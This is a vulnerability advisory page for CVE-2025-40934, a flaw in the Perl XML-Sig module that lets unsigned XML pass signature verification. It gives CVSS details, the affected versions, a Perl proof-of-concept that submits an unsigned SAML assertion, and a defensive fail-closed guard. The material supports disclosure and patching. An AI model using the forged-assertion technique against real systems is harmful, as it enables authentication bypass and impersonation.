Security Vulnerability Report
CVE-2025-40934 CVSS 9.3 CRITICAL

Published: 2025-11-26 23:15:48
Last Modified: 2025-12-30 15:21:37
Source: 9b29abf9-4ab0-4765-b253-1875cd9b441e

Description

XML-Sig is a Perl module to validate signatures on XML files. Versions 0.27 through 0.67 incorrectly validate XML files if signatures are omitted: an unsigned XML file should return an error message, but the affected versions return true when attempting to validate an XML file that contains no signatures. An attacker can remove the signature from the XML document to make it pass the verification check.

CVSS Details

CVSS Score: 9.3
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:xml\:\:sig_project:xml\:\:sig:*:*:*:*:*:perl:*:* - VULNERABLE
XML-Sig 0.27
XML-Sig 0.28
XML-Sig 0.29
XML-Sig 0.30
XML-Sig 0.31
XML-Sig 0.32
XML-Sig 0.33
XML-Sig 0.34
XML-Sig 0.35
XML-Sig 0.36
XML-Sig 0.37
XML-Sig 0.38
XML-Sig 0.39
XML-Sig 0.40
XML-Sig 0.41
XML-Sig 0.42
XML-Sig 0.43
XML-Sig 0.44
XML-Sig 0.45
XML-Sig 0.46
XML-Sig 0.47
XML-Sig 0.48
XML-Sig 0.49
XML-Sig 0.50
XML-Sig 0.51
XML-Sig 0.52
XML-Sig 0.53
XML-Sig 0.54
XML-Sig 0.55
XML-Sig 0.56
XML-Sig 0.57
XML-Sig 0.58
XML-Sig 0.59
XML-Sig 0.60
XML-Sig 0.61
XML-Sig 0.62
XML-Sig 0.63
XML-Sig 0.64
XML-Sig 0.65
XML-Sig 0.66
XML-Sig 0.67

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
perl
#!/usr/bin/env perl
use strict;
use warnings;
use XML::Sig;

# CVE-2025-40934 PoC - XML-Sig Signature Validation Bypass
# Affected versions: 0.27 to 0.67

# Create an unsigned XML document (simulating attacker removing signature)
my $unsigned_xml = <<'XML';
<?xml version="1.0" encoding="UTF-8"?>
<Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" ID="_1234567890" IssueInstant="2025-01-01T00:00:00Z" Version="2.0">
  <Issuer>https://malicious-issuer.com</Issuer>
  <Subject>
    <NameID>[email protected]</NameID>
  </Subject>
  <Conditions NotBefore="2025-01-01T00:00:00Z" NotOnOrAfter="2026-01-01T00:00:00Z"/>
</Assertion>
XML

# Initialize XML-Sig verifier
my $verifier = XML::Sig->new({
    x509 => 1,
    cert => "./test_cert.pem",
    key  => "./test_key.pem",
});

# This should fail for unsigned XML, but vulnerable version returns true
my $result = $verifier->verify($unsigned_xml);

if ($result) {
    print "[VULNERABLE] Signature verification passed (INCORRECT!)\n";
    print "[VULNERABLE] The unsigned XML document was accepted as valid\n";
    print "[VULNERABLE] This indicates the system is vulnerable to CVE-2025-40934\n";
} else {
    print "[PATCHED] Signature verification correctly failed for unsigned XML\n";
    print "[PATCHED] System is NOT vulnerable to CVE-2025-40934\n";
}

# Additional check: Verify signature field is actually checked
print "\n[INFO] Testing with properly signed XML for comparison...\n";
print "[INFO] If both tests pass, the verification logic is broken\n";
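
The defensive counterpart to the check above: a fail-closed guard that a caller on an affected version can put in front of `verify()`, so a document with no signature is rejected before the module is consulted. This is an added example, not code from this page or from the XML-Sig project; `verify_fail_closed` and the stub callback are hypothetical names, and it assumes XML::LibXML is installed.

```perl
#!/usr/bin/env perl
use strict;
use warnings;
use XML::LibXML;
use XML::LibXML::XPathContext;

my $DSIG_NS = 'http://www.w3.org/2000/09/xmldsig#';

# Hypothetical helper: returns 1 only if the document carries at least one
# structurally complete ds:Signature AND the supplied verifier callback
# accepts it. Every other outcome, including exceptions, returns 0.
sub verify_fail_closed {
    my ($xml, $verify_cb) = @_;

    my $doc = eval { XML::LibXML->load_xml(string => $xml, no_network => 1) };
    return 0 unless $doc;          # unparsable input is rejected

    my $xpc = XML::LibXML::XPathContext->new($doc);
    $xpc->registerNs(ds => $DSIG_NS);

    my @sigs = $xpc->findnodes('//ds:Signature');
    return 0 unless @sigs;         # the case the affected versions accept

    for my $sig (@sigs) {
        # A usable signature needs a non-empty value and at least one reference
        my $value = $xpc->findvalue('normalize-space(ds:SignatureValue)', $sig);
        my @refs  = $xpc->findnodes('ds:SignedInfo/ds:Reference', $sig);
        return 0 unless length($value) && @refs;
    }

    # Only now delegate to the real verifier; a die counts as failure
    my $ok = eval { $verify_cb->($xml) };
    return $ok ? 1 : 0;
}

# Constructed sample input: an assertion with no ds:Signature element
my $unsigned = '<Assertion xmlns="urn:oasis:names:tc:SAML:2.0:assertion" ID="_constructed"/>';

# Stub standing in for a verify() that returns true for anything,
# which is the behaviour the description attributes to 0.27 through 0.67
my $always_true = sub { 1 };

print verify_fail_closed($unsigned, $always_true) ? "accepted\n" : "rejected\n";

# In real use, pass the module's own check as the callback, e.g.
#   verify_fail_closed($xml, sub { $verifier->verify($_[0]) });
```

The guard only establishes that a signature is present and well-formed before delegating; the cryptographic decision still comes from `verify()`.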

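References

https://github.com/perl-net-saml2/perl-XML-Sig/issues/63 (Issue Tracking, Patch)
https://github.com/perl-net-saml2/perl-XML-Sig/pull/64 (Issue Tracking)
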
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40934", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2025-11-26T23:15:47.773", "lastModified": "2025-12-30T15:21:37.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XML-Sig versions 0.27 through 0.67 for Perl incorrectly validates XML files if signatures are omitted.\n\nAn attacker can remove the signature from the XML document to make it pass the verification check.\n\nXML-Sig is a Perl module to validate signatures on XML files.  An unsigned XML file should return an error message.  The affected versions return true when attempting to validate an XML file that contains no signatures."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xml\\:\\:sig_project:xml\\:\\:sig:*:*:*:*:*:perl:*:*", "versionStartIncluding": "0.27", "versionEndIncluding": "0.67", "matchCriteriaId": "8F401AE6-72AA-4188-B763-4354213AA0BB"}]}]}], "references": [{"url": "https://github.com/perl-net-saml2/perl-XML-Sig/issues/63", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/perl-net-saml2/perl-XML-Sig/pull/64", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Issue Tracking"]}]}}